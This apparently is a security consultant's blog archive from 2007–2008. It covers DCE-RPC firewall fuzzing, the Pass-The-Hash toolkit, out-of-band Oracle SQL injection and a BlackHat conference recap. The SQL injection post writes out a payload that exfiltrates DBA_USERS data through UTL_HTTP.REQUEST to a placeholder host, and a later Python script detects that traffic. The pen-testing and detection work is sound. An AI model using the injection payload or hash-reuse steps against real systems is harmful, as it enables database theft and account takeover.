Saturday, May 3, 2008

Fun with DCE-RPC Fuzzing

I recently finished working on an interesting project that was a mix of architecture assessment and penetration testing.  One of our key tasks was to analyze the effectiveness of a firewall that they had configured to perform layer 7 inspection of Windows DCE-RPC traffic.  The firewall was designed to enforce a white-list of allowed RPC services (based on UUID) and deny all others.  It also did some fancy dynamic port management, automatically opening/closing high-number ports for permitted RPC connections.  
Our pen-tests usually don't entail a significant amount of packet crafting and manipulation, since we're more typically working at the OS or application level.  So testing this firewall's RPC filtering mechanism was a fun challenge.  We ended up relying on two tools to perform fuzzing attacks, primarily manipulating the UUID and function call fields in the RPC packets:
  • Impacket - A collection of Python classes developed by the Core Security guys.  Includes support for DCE-RPC v4 and v5.  I used this to write up a number of scripts for each test case.
  • SPIKE - Popular fuzz testing framework based in C - it includes a pre-built msrpc fuzzing tool.
I initially wanted to use Scapy, but it unfortunately doesn't have native support for DCE-RPC and I didn't have the time (or skill) to build out the protocol.  Of course, we also heavily relied upon Wireshark since it decodes DCE-RPC v5 very nicely, and Metasploit to launch a few known RPC exploits.
After extensive brainstorming and failed attempts with my colleague, we were able to trick the firewall into opening RPC ports by spoofing valid RPC sessions - but only for white-listed UUIDs.  I was more interested in getting the firewall to choke on malformed endpoint mapper requests or other RPC packets, and possibly create denial of service conditions (or get packets with disallowed UUIDs past the filtering mechanism).  No luck there, mostly due to how the RPC endpoint mapper and firewall work together to dynamically open ports.  The specific port opened for an RPC service is dictated by the endpoint mapper response and cannot be defined by the initial request - which makes sense, the client shouldn't have any say in what port the server chooses for the service. 
Despite failing to completely own the firewall, designing and implementing our testing approach was a great experience - especially coding the Python test scripts with Impacket.

Thursday, August 23, 2007

Pass the hash, NTLM style

Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.

After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released Pass-The-Hash Toolkit, which runs on Windows and works with NTLM hashes. It's comprised of two key modules:
  • IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.
  • WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system.
No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the-middle attack, like the WPAD proxy exploit. As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat.

Wednesday, August 15, 2007

Out-of-band Oracle SQL injection with HTTP Requests

I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.

This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.

UTL_HTTP is a built-in Oracle SQL function that issues HTTP requests. The syntax is pretty simple: 

UTL_HTTP.REQUEST('http://www.foo.com/index.php')
returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.

For example, consider the following SQL:

UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))

The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:

158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
(assuming 158.72.4.21 is our target DB server)

So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. You can then view the result of each SQL injection in your server logs. On Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.

The biggest limitation to this approach is that you can only query for one row at a time - you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.REQUEST function itself, not the web server end.) But it is still a lot more efficient than using blind SQL injection to brute force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database.  Experiment with running on different ports.

There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.

Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.
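
The point above, spotting a database server that has started issuing HTTP requests, is straightforward to check in an egress proxy or web server log in the Common Log Format shown earlier. The script below is an added example, not part of the original post; it assumes you keep an inventory of database server addresses (here the placeholder 158.72.4.21 from the log line above) and runs over a few constructed log lines.

```python
import re
from collections import Counter

# Constructed sample lines in the Common Log Format used in the post.
# 158.72.4.21 plays the role of the database server; all addresses are placeholders.
SAMPLE_LOG = """\
158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
158.72.4.21 - - [08/Aug/2007:10:02:41 +0000] "GET /SYSTEM HTTP/1.1" 404 0 - -
10.1.1.50 - - [08/Aug/2007:10:03:02 +0000] "GET /index.php HTTP/1.1" 200 512 - -
158.72.4.21 - - [08/Aug/2007:10:03:10 +0000] "GET /APPUSER HTTP/1.1" 404 0 - -
"""

# Assumed inventory: hosts that should never initiate outbound HTTP on their own.
DB_SERVERS = {"158.72.4.21"}

# Client IP, timestamp, method, path and status from a CLF line.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_clf(line):
    """Return the parsed fields of one CLF line, or None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def find_db_egress(log_text, db_servers):
    """Entries whose client is a database server. The path segment is where an
    injected UTL_HTTP.REQUEST carries the query result, so it is kept for review."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_clf(line)
        if entry and entry["ip"] in db_servers:
            hits.append((entry["ip"], entry["ts"],
                         entry["path"].lstrip("/"), int(entry["status"])))
    return hits


def summarize(hits):
    """Requests per offending source; a burst of one-row fetches shows up as a high count."""
    return Counter(ip for ip, _, _, _ in hits)


if __name__ == "__main__":
    found = find_db_egress(SAMPLE_LOG, DB_SERVERS)
    for ip, ts, leaked, status in found:
        print(f"{ts} {ip} requested path segment {leaked!r} (HTTP {status})")
    print(summarize(found))
```

The 404 status is irrelevant to the leak: the data has already left in the request line, so alert on the source address, not the response code.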

Monday, August 13, 2007

SensePost Releases Squeeza SQL Injector, Updates Wikto

As referenced in my BlackHat wrap-up, SensePost has just released the squeeza tool and accompanying slide deck from their presentation.  Their work on timing-based attacks is really interesting, particularly what they have dubbed as "Cross-Site Request Timing": it's apparently possible to violate the same-origin policy by tracking page load times across multiple domains. They've also released an update to Wikto, bumping it to 2.0 - judging from the change log it's a pretty substantial re-write.

Saturday, August 4, 2007

BlackHat Wrap-Up

I've returned and recovered from a fun week at BlackHat in Las Vegas.  The conference was a great experience and had an excellent selection of speakers.  As with other hacking conventions I've attended in the past, it was humbling to see how smart some of the presenters and attendees are.  I unfortunately couldn't make it to Defcon this year (damn client obligations!), but four days is just about the right length of time to stay in Vegas.  

To share a few random observations and cool things:
  • At this point it should be clear that browser vulnerabilities are this "generation's" OS-level vulnerabilities.  Owning the client means you can do just about anything, including full-fledged attacks against internal networks.  David Byrne's anti-DNS pinning really drove this home, particularly when he used Java LiveConnect to proxy a full Nessus scan against an internal host through the browser. 
  • Billy Hoffman's talk on "The Little Hybrid Web Worm That Could" was really interesting - he's always a good presenter.  He illustrated several pieces of proof-of-concept JavaScript code that can self-mutate, parse sites like Secunia to "learn" new vulnerabilities, and exploit web application vulnerabilities.  It won't be long before we see these kinds of worms in the wild, as the technology and research are already in place.  
  • Errata Security demoed a tool called Ferret that combines WiFi sniffing and gathering sensitive information into somewhat of a point-and-click affair.  It works with an HTTP proxy component that lets you easily use session cookies hijacked from other users' browser sessions.  He used it to hop onto an attendee's GMail account while on stage, which really got the audience going.  There's nothing new here - we all know you can sniff and re-use cookies from non-SSL'd connections - but the tool is still a neat implementation.
  • A presentation on extrusion detection systems by Matasano ended up being far more interesting than I expected.  While their research focused on vulnerabilities in agent-based tools designed to prevent information leakage, it conceptually applied to any agent-based product (I'm thinking of SIM tools in particular).  Through reverse engineering, they revealed how trivial it would be to take over agents, execute code at the Windows kernel level, spoof reporting data, and cause other havoc.  It made me really want to grab a copy of PaiMei and learn more about reversing and fuzzing.
  • The Metasploit team gave a fantastic two-part presentation (available on their site) on tactical penetration testing.  Their message was one we've always preached to our clients: pen-testing should not just be vulnerability scanning and firing off exploits.  They covered some interesting new resources for footprinting targets and network discovery, such as DomainTools.com and Paterva.com.  

    The presentation also included a demo of a new Metasploit component that facilitates NTLM hijacking.  You basically capture the victim's NTLM hash through a man-in-the-middle attack (the WPAD proxy hijack technique works great for this), and can then re-use this hash to authenticate with the user's credentials.  There's no need to crack the NTLM hash!  I plan on testing this one out in our lab - although our rules of engagement unfortunately often forbid us from performing network redirection attacks against clients.   
  • SensePost had a presentation on timing-based attacks that I wish I had not missed.   They demonstrated "SensePost-aTime", which leverages timing information to perform SQL injection and extract data.  I couldn't find it on their web-site yet, but will post as soon as a link is available.  Until then, you can check out a recent post on ha.ckers.org that covers a "res://" timing attack that enumerates a user's local files through the browser.
  • My "Best Booth Gimmick" award goes to Fortify Software - their Borat-inspired "Discover Hackistan" promotion was pretty damn funny.
Personal goal for next year: to put together a presentation that I can at least attempt to submit for BlackHat or Defcon.